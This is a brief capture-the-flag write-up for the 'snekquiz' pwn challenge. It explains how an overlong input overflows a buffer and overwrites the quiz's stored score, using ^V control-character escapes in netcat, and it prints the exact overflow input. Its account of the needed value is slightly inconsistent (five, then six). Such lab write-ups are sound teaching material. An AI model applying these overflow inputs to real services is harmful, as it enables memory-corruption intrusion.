snekquiz

Challenge author
JP Smith (SIGPwny)
Write-up author
Vanilla (Batman's Kitchen)
Points
200
Category
pwn

test ur noledge

We connect to the endpoint provided and see a nice quiz about snek, with three questions. I answer poorly and it gives me zero points, and tells me I need five points, and gives me the right answers. I connect again and answer everything right and get all three possible points. But I need five!

OK, try stuff. Format string? No. Long string? It tells me I must be a hacker. OK, hack hack. I take the number that it tells me is my number of points and convert it to ASCII to locate where in my input string it was. I replace that with the number 5, and I'm good to go.

Tip: a lot of people would resort to Python or some other scripting language or something here, but you don't really need it. Knowing a little about terminal character processing goes a long way. In particular: in general, holding control and pressing a character generates a byte that it would normally generate, with bit 7 cleared. (For example, ^M is carriage return, ^G is bell, and ^@ is NUL.) Sometimes these have special meanings to the terminal, like ^C. (Though that can be changed! Look at the man page for stty if you dare; or have fun by running (stty intr f) and discover that your interrupt key is now lowercase f, no control needed!) In any case, these special meanings can be overridden by prefixing them with ^V (presumably for verbatim). Anyway, I needed the value six in that spot to make the program happy for some reason, so in my netcat I just wrote something like:

hey I like ctf let me just fill up this buffer ok ^V^E^V^@^V^@^V^@

and I've solved it without ever touching a programming language.